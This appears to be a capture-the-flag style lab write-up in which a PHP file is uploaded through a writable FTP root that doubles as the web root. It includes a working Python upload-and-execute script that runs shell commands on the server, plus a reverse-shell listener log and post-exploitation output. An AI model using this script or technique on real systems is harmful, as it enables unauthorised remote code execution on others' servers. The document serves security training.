Arbitrary File Upload


The target web server runs a single-page PHP web application, and the web root is mapped directly onto the FTP server listening on port 21. Since the FTP account has write access, a PHP payload can be uploaded straight into the web root over FTP and then executed by requesting it over HTTP.

ftp> pwd
Remote directory: /
ftp> put shell.php 
local: shell.php remote: shell.php
229 Entering Extended Passive Mode (|||2139|)
150 File status okay; about to open data connection.
100% |*******************************************************************************************|  9296      123.12 MiB/s    00:00 ETA
226 Closing data connection.
9296 bytes sent in 00:00 (149.36 KiB/s)

Upload complete
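The same upload-then-trigger step, scripted, as an added example that is not part of the original write-up. It drops a small PHP probe into the FTP root, fetches it over HTTP and checks the response: if the response contains the probe's marker the file was executed server-side, if it contains the literal `<?php` tag the upload worked but PHP is not executed for that path, and anything else means the FTP directory is not the web root. The host, ports, credentials and file name are assumptions; the PHP reverse shell itself is not reproduced here.

```python
"""Upload a PHP probe over FTP into the web root and confirm it executes over HTTP.

Added example for the write-up; host, ports, credentials and file name are assumptions.
"""
import ftplib
import io
import secrets
import urllib.request

# Assumed target details (not from the write-up).
FTP_HOST = "192.168.203.46"
FTP_PORT = 21
FTP_USER = "anonymous"
FTP_PASS = "anonymous@"
HTTP_BASE = "http://192.168.203.46"
PROBE_NAME = "probe.php"


def build_probe(marker: str) -> bytes:
    """Return a PHP file that prints a unique marker followed by the account PHP runs as.

    Seeing the marker in the HTTP response proves the server executed the file
    rather than merely serving its source.
    """
    php = (
        "<?php\n"
        f"echo 'MARK:{marker}:';\n"
        "echo function_exists('shell_exec') ? trim(shell_exec('whoami')) : 'no-shell_exec';\n"
        "?>\n"
    )
    return php.encode()


def classify_response(body: bytes, marker: str) -> str:
    """Classify the HTTP response for the uploaded probe.

    'executed'         - marker present, PHP ran (upload landed in an executable web root)
    'served-as-source' - raw PHP came back, file is reachable but not interpreted
    'not-found'        - neither, so the FTP root is not (or not wholly) the web root
    """
    text = body.decode(errors="replace")
    if "<?php" in text:
        return "served-as-source"
    if f"MARK:{marker}:" in text:
        return "executed"
    return "not-found"


def upload_via_ftp(host: str, port: int, user: str, password: str, name: str, data: bytes) -> None:
    """STOR the probe into the FTP root (binary mode so the bytes arrive unchanged)."""
    with ftplib.FTP() as ftp:
        ftp.connect(host, port, timeout=10)
        ftp.login(user, password)
        ftp.storbinary(f"STOR {name}", io.BytesIO(data))


def fetch(url: str) -> bytes:
    """GET the probe over HTTP; a 404 is treated as an empty body."""
    try:
        with urllib.request.urlopen(url, timeout=10) as resp:
            return resp.read()
    except urllib.error.HTTPError as err:
        return err.read()


def check_target() -> str:
    """Upload, trigger and classify in one step; returns the classification string."""
    marker = secrets.token_hex(8)
    upload_via_ftp(FTP_HOST, FTP_PORT, FTP_USER, FTP_PASS, PROBE_NAME, build_probe(marker))
    body = fetch(f"{HTTP_BASE}/{PROBE_NAME}")
    return classify_response(body, marker)


if __name__ == "__main__":
    print(check_target())
```

Once the probe classifies as `executed` the same upload path can carry a full PHP reverse shell, which is what the write-up does next; a `served-as-source` result means the upload succeeded but the handler for `.php` is not active on that path, so a different extension or directory is needed rather than a different upload channel.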

Triggering the payload

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/authby]
└─$ nnc 242
listening on [any] 242 ...
connect to [192.168.45.245] from (UNKNOWN) [192.168.203.46] 49176
SOCKET: Shell has connected! PID: 3016
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation.  All rights reserved.
 
C:\wamp\bin\apache\Apache2.2.21> whoami
livda\apache
 
C:\wamp\bin\apache\Apache2.2.21> hostname
LIVDA
 
C:\wamp\bin\apache\Apache2.2.21> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Local Area Connection 2:
 
   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::2d12:cfc9:2a58:43c4%12
   IPv4 Address. . . . . . . . . . . : 192.168.203.46
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.203.254
 
Tunnel adapter Local Area Connection*:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
 
Tunnel adapter Local Area Connection* 9:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

Initial foothold established on the target system as the apache service account (livda\apache) via arbitrary file upload through the FTP-mapped web root.